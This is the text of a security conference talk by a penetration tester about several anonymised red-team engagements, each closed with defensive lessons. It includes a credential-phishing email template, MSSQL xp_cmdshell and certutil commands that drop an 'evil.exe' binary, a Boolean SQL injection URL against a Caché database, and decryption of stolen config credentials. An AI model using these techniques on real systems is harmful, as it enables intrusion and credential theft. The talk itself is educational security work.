“Tales from the Dark Side” – Dor Tumarkin

Tales from the
Dark Side
Dor Tumarkin, Application Security Researcher
Checkmarx

2
Presentation Agenda
• Introduction
• Penetration-Testing, Red-Teaming in a nutshell
• COOL STORIES
• Questions

3
•
•
•
•
• 2.5 years in Cisco Advanced
Services
Research
New
Tricks
Write
ReportsHave Fun
at Someone
Else’s Expense

5
• Identify all vulnerabilities in a well-
defined scope
• Exploit and demonstrate risk to
environment
• “Can you pick the lock on my front
door? Are my windows secure?”
Penetration Testing Red Team
• Identify all vulnerabilities on a path
to a specific goal within an
organization
•
• Exploit anything in your way –
computers, employees, nice
security guards
• “Can you steal the jewels from the
safe inside this locked building?”

7
Mind the Air-Gap
• A Red Team on a big vendor (let’s call them E-Corp)
• Hundreds of thousands of internet facing IPs
• Behind a firewall, an IPS
• Mostly updated
• Dozens of web-applications
• With Web Application Firewalls
• Many interesting vulnerabilities, but no massive show-stoppers
• Remote access has 2-factor authentication, so phishing is limited
• …And we are looking for a solid way in

8
Mind the Air-Gap
• Multiple “presales labs” – blank demo environments owned by E-Corp,
accessible via VPN
• One ESX server with multiple virtual E-Corp appliances inside
• No sensitive information
• No configurations
• No access to/from E-Corp’s network
• …but all passwords are either default or simple
(ecorp123)
• VPN
• ESX
• Remote Desktop
• SSH

9
Mind the Air-Gap
• But what use to us is an empty lab?
• Well…
• So we log in, aaaand…
Boom.

10
Mind the Air-Gap
• This means that this ESX server for this
lab is physically in a rack at some E-Corp
site
• But we’re not in quite yet

11
Mind the Air-Gap
Where are we going to get credentials in an empty lab???
Ooooh nooooo…

12
Mind the Air-Gap
• Account credentials are
SSO, double as Wi-Fi
credentials
• And we got into corporate,
just like that, over the air.
• And like every fairy-tale, it
had a happy ending…
• …where we scored
domain admin rights a few
days later (LLMNR, etc.)

13
Conclusions
• No such thing as a “useless”
or “harmless” environment
• Particularly – no such thing as
“doesn’t need security”!
• “Remember my Password” on
an untrusted computer in an
untrusted lab? Come on, man.

15
King without a Crown
• Sometimes, though not often, challenges present
themselves INSIDE organizations
• Endpoint security
• Network security
• Tripwires
• This time challenges were presented as policies

16
• We’re inside a massive organization – Umbrella Corp.
• Main objectives complete with time to spare
• Infiltrated from outside
• Collected most prized data – business development and
finance
• Nobody noticed
• Collected a handful of domain user accounts on the way
• Secondary objective: own the domain - be a domain
administrator!

17
• We’ve searched ceaselessly for such accounts or
employees by crawling a central management
application that manages user accounts
• Everything is finely distributed between employees
• Company policy - No domain administrators!

18
• Wait a minute – a central management web-application?
• Built using proprietary code!
• If it can manage all accounts – then it must have a really
powerful active directory user!
• Maybe even… a domain admin?
• Comb the code repositories!

19
• The dev code repo environment was very easy to find
• Code repository contains config files!
• Config file contains credentials!
#LDAP user
Username=KCD3A08381467823D4013960E75E465F0B00C5E3BAEFBECBB
Password=JFJA90BVM2ZO0YJF67NQ72YUVN7B71POCZM3098FABVDADG3Q
• Wait, that doesn’t look right…

20
• Config file contains encrypted credentials 
• Company policy – passwords at rest MUST be
encrypted or hashed

21
• But the central management web-application isn’t the
SERVER receiving these credentials
• It is a CLIENT of the active directory when using them
User Web Server Backend
Client Client ServerServer
• Password-driven authentication requires Clients to have
the actual password!

22
• Server has to have credentials in “plaintext” at some
point…
• Therefore - It must be able to decrypt this file!

23
1. Identify what part of code opens the encrypted
credentials config file
$filename = 'config.ini';
open($fh, $filename)
or die "Could not open file '$filename'!";
*Pseudo-Code
*

24
2. Trace code from that point to see where file is read, and
where it is decrypted
while ($row = $fh.readline()) {
if ($row.startsWith('Username=')) {
$username = crypto.decrypt($row[9:]);
}
if ($row.startsWith('Password=')) {
$password = crypto.decrypt($row[9:]);
}
}

25
3. Reverse-engineer encryption!
Function decrypt($encrypted) {
$encrypted = reverseString($encrypted);
$encrypted = $encrypted << 8;
$magic = blowfish($encrypted, $keyOne);
$decrypted = doMagic($magic,$keyTwo);
return $decrypted;
}
$keyOne = ‘tQ@vH8dM%agy6Y4RO’;
$keyTwo = ‘!#YCEKiMKijFtgcyZ’;
This is very interesting
and all but…
Keep it simple!
Grab their crypto!

26
4. “Develop” a decryption tool
[stolen code goes here]
print(“User:” + decrypt(“KCD3A08381467823D4013960E75E465F0B00C5E3BAEFBECBB”));
print(“Pass:” + decrypt(“JFJA90BVM2ZO0YJF67NQ72YUVN7B71POCZM3098FABVDADG3Q”));
User: admin1user
Pass: 9m5!4G4GaZ1VU@oi9Xh
5. Profit

27
• And that is how we became the first human
domain admin they’ve seen in years
• Was the “No domain admins” policy adhered?

28
Conclusions
• A lock is meaningless if you
attach the keys to it – ditto for
encryption and its keys
• Keeping actionable information,
such as passwords, in a dev
environment is dangerous
exposure
• Bending policies is not a way to
solve problems, it’s a way to
obscure them (barely)

29
The Phish that
Kept on Phishing

30
The Phish that Kept On Phishing
• Most phishing awareness exercises involve employee awareness, which is
very important
• Access that the average user has
• Would clicking a suspicious link mean the user will also submit
their password?
• Or download and install a file?
• “Spear-Phishing” – are employees aware of more
sophisticated, targeted attacks?
• But most phishing awareness exercises aren’t concerned with
the risk of a successful attack

31
• Our client, a bank, wanted to find out what are the risks it faces from
phishing
• We’ll call them Hacme, because why not
• They also required us to build a system for keeping track of phishing targets
• Each targeted e-mail received a link with a token
• This token was saved along with every action
*Illustration, it actually looked nothing like this
User Token IP User Agent Action
Debbie M. ja1Kd2moXpP2mJ xxx.xxx.90.3 Mozilla/5.0 (iPhone; CPU iPhone OS…) Clicked Link
yyy.yyy.10.12 Mozilla/5.0 (Windows NT 6.1; WOW64) Clicked Link
yyy.yyy.10.12 Mozilla/5.0 (Windows NT 6.1; WOW64) Logged in!
Andrew R. u0IL9aZxQmnV3a yyy.yyy.10.12 Mozilla/5.0 (Windows NT 6.1; WOW64) Clicked Link
yyy.yyy.10.12 Mozilla/5.0 (Windows NT 6.1; WOW64) Downloaded File
John U. 73aBVlkq9Arq8nb zzz.zzz.90.114 Mozilla/5.0 (Linux; Android 4.0.4;…) Clicked Link

32
• Good credentials to phish for should:
• Lead to as many sensitive environments as possible (SSO)
• Lead to sensitive data
• Lead to MORE ACCESS

33
• OWA is likely to contain sensitive
information
• Accessible online
• Easy to impersonate by either
installing your own server, or just
replicating the login
• Seamless Phishing – user submits
credentials, credentials are saved
by attacker, client is forwarded
seamlessly into their real OWA
inbox
• Never know what hit ‘em

34
From: it-guy@hacme-mail.com
To: [target]@hacme.com
Please forward.
---Forwarded Message---
From: it-manager@hacme.com
Subject: Testing New OWA Login
To All Employees,
As many of you know, we were recently the targets of a large
scale phishing attack[…]
We are transitioning to a new & secure environment[…]
https://owa.hacme-mail.com/owa/auth/login.aspx[…]

35
• Using our tracking system, we met our
favorite victim ever - Debbie.
• Debbie is the best!
• We sent out 41 e-mails
• How many users did we phish within 2 hours?

36
117
That’s 300%
(98 different users phished
using Debbie’s token)

37
• On that day we celebrated Debbie, and all
Debbies everywhere
• In retrospect we found out it was way worse
than we thought
• …Debbie actually pulled this e-mail out of her
spam box, before sending it to 300+ people.
• Because despite this phishing e-mail
successfully passing through our testing
spam filters…

38
• We were able to prove that spam filters aren’t a good
defense
• Also that their phishing mitigation did not work
• But also – how easy it is to compromise employee e-
mails
• We got a very broad user-base coverage – HR, PR, IT
users
• IT users apparently shared passwords over e-mail, too.

39
• Lets talk about Debbie• Is Debbie REALLY a
?
• She may have messed up in her awareness
• She may have set the bar low
• But anyone can fall for the right lie

40
Conclusions
• Remember this acronym:
N.B.D.
Never.
Be.
Debbie.
• Even people who practice
N.B.D. daily can be fooled –
always know your risks.
• 2-factor authentication, in
this case, would have made
a huge difference.

42
A Crowbar for Binary
• A big financial institute had us engage
their online assets and hack in
• We’ll call them Golden Calf
Investments
• Not that many online assets
• Most interesting ones were scoped
out because:
• No testing accounts or environments
• “Federal Regulations” (pfffff)

43
• How do we get in if we’re told to stay away??
• Some canned marketing applications…
• Skin deep customer service applications…
• …Outsourced, not even part of the organization
• A couple of old employee-only applications…
• Wait a minute, that last one sounds promising!

44
The New Target:
• Application with known exploits
• Got App-Admin in… 5 minutes?
• Got code running on web-server
within a couple of hours

45
• Realize web-server is boring, except
for one database connection
• Database is internal, beyond DMZ?
• New goal: we own the database
• Wrote code to go through web-
server and directly talk to DB
(SQL)

46
• So what database are we really attacking here?
• MSSQL
• Database running as “sa” (lol)
• VERY strict firewall rules
• Can’t pull malware.
• Can’t do much from inside out, really.
• So we HAVE to push!

47
Challenge #1 – OS Commands:
• MSSQL feature - use
xp_cmdshell to execute OS
commands
• There’s a character restriction
in SQL queries however
• Binaries would never fit

48
Challenge #2 – Writing to Disk:
• Introducing the latest in computer hacking
technology:
THIS GUY!

49
Challenge #3 – Normalization:
• Binary is binary
• It’s 99% garbage to (most) humans
• May contain bytes that break requests, or get
altered on the way
• Normalize with Base64 – all bytes converted to
alpha-numeric

50
xp_cmdshell ‘ ‘;
SQL Query
Hello
World!
Code
SGVsbG
8gV29yb
GQh
Base64
echo SGVsbG8gV29ybGQh >> evil.b64.txt
Echo to File
• Now that we know how to get binaries unto
the server, let’s do it!
• Convert code to base64
• Chunk to segments that fit size restriction
• For every segment – create command
• For every command – execute with SQL

51
• Great job getting a junk base64 file on the server!
• How do we convert it back to binary without tools?
• Maybe something that is naturally stored as either?
• A certificate can be either a binary or base64.
• It would be great if there was some sort of, I don’t
know, a utility in Windows?util
cert
.exe -decode evil.b64.txt evil.exe

52
• Score!
• We’ve demonstrated executing a binary
• From the internet
• Riding a web server
• Pass through the database with queries
• And right into the DB’s operating system
• Can install tools to scan internal network
• Can have remote control with malware over DNS
• In retrospect – this DB was co-hosted with their
main business transaction OraDB. Double Score!

53
Conclusions
• A small misconfiguration behind
an outdated system can be
crowbarred into a gaping hole
• Always patch your things, no
matter how insignificant they
seem
• The Principle of Least Privilege

55
(re)Applied Sciences
• Reinventing the wheel is usually not recommended
when unnecessary
• With the myriad of technologies out there, though,
you never know what you’ll come across
• Sometimes, it’s all about taking something you
know and understand and applying it to something
you don’t

56
• We were working on a large shipping company,
let’s call them “Planet Express”
• We’ve found an application that behaves very
oddly
• Landing page is empty
• Dorking “site:” leads to a directory listing

57
• Directory listing contains… e-mail files?
• E-Mail files created very recently
• E-Mail contents seem automated, and contain
links back to the site itself
• Links are to actual order information

58
(Sophisticated Recreation)
• Why is this application so weird?
• Assumption: application is fully functioning when
approached from internal network – externally,
only links to orders can be accessed by clients

59
• So of course, we test the only parameter we can
access in this app by setting “orderId” to “1’ A ‘”
(Sophisticated Recreation)
• …Pardon?
• Not like any SQL error I have ever seen

60
• And so a quick Google search
taught us that this is, in fact…

61
CacheIntersystems SQL
Who?? What?? Ok, at least we
know this word

62
• What is this database, even??
• For one – it’s SQL, so it probably adheres to the same
syntax:
• SELECT columns FROM database.table WHERE condition
• At the same time – it exhibits the exact same behavior a
“common” SQL error would:
• Injected apostrophe (‘) breaks the syntax of the query
• Additional verbs after ‘ error out
• We can probably add more to the query, and get data!

63
• So we can probably inject…
• …but the internet is clueless
• Very rare
• No tools
• No exploits
• Not even a tutorial
I DON’T KNOW WHO YOU ARE
BUT I WILL READ ABOUT YOU
AND I WILL HACK YOU

64
• Which injection type do we choose?
• UNION based – unite columns to create
new tables, hope web server renders right
• Error based – trigger an error that reflects
information in it’s contents
• Boolean based – identify true and false
conditions, use these as an oracle for data
• Boolean based are the only ones that
require very little prior knowledge

65
True statement
False statement
Give me orderId
“AH0010-015” if 1=1
Give me orderId
“AH0010-015” if 1=0

66
• So what do we need for a Boolean SQL injection to
work?
• We need to establish the injection variables for what we
want to retrieve:
• SELECT columns FROM database.table WHERE boolean
• How do we find the database name?
• Table name?
• Column name?
• The right condition to help us retrieve data?

67
• SQL usually has a table of tables, a table of databases,
a table of columns etc.
• These are all mapped out in a known way
• Tools like SQLMap can automate the process because,
once they fingerprint the database, they know where to
find metadata
• But they’ve never
even heard of
“Intersystems
Cache SQL”

68
• Research – from documentation:
• Databases - SELECT SqlSchemaName FROM %dictionary.compiledclass
WHERE SqlSchemaName LIKE ‘%’
• Tables - SELECT SqlSchemaName FROM %dictionary.compiledclass
WHERE SqlSchemaName = 'db_name' AND SqlTableName LIKE
'table_name'

69
• Research roadblock – no documentation of columns? Not
in the same Dictionary.compiledclass??
• Ask an expert on StackOverflow!

70
• We know where to get all the metadata we need to
get all the stored data we want
• Now for a condition, and we’re good to go
• Keep it simple!
• WHERE parameter LIKE ‘[inject]%’
• WHERE parameter LIKE ‘p%’
• WHERE parameter LIKE ‘pa%’
• WHERE parameter LIKE ‘pas%’…

71
• Final injection form:
orders.planetexpress.com/orders/manage/orders.jsp?orderId=AH00010-015' AND
EXISTS (SELECT SqlSchemaName FROM %dictionary.compiledclass WHERE SqlSchemaName
= 'db_name' AND SqlTableName LIKE 'table_name‘)
• Building this into a Python script that enumerates
letters and numbers on the condition replicates the
principles of SQLMap’s Boolean-based SQL
injection

72
• We never made it into a nice “tool”
form
• We knew we’re not likely to see this
system ever again…
• But we dumped enough of the
database to demonstrate we could
get all shipping information on every
single client

73
Conclusions
• Exotic technology is still
technology
• Obscure is not Secure
• A simple external test would
have revealed the information
leakage which has lead to this
exploitation

74
Final
Thoughts
• Hacking is a lot more than just
known vulnerabilities and
available tools – it’s also a
creative process
• Never underestimate your
opponents
• Understanding & knowing risks
and impact is as important as
mitigating vulnerabilities in your
network

“Tales from the Dark Side” – Dor Tumarkin

More Related Content

Recently uploaded

Featured

“Tales from the Dark Side” – Dor Tumarkin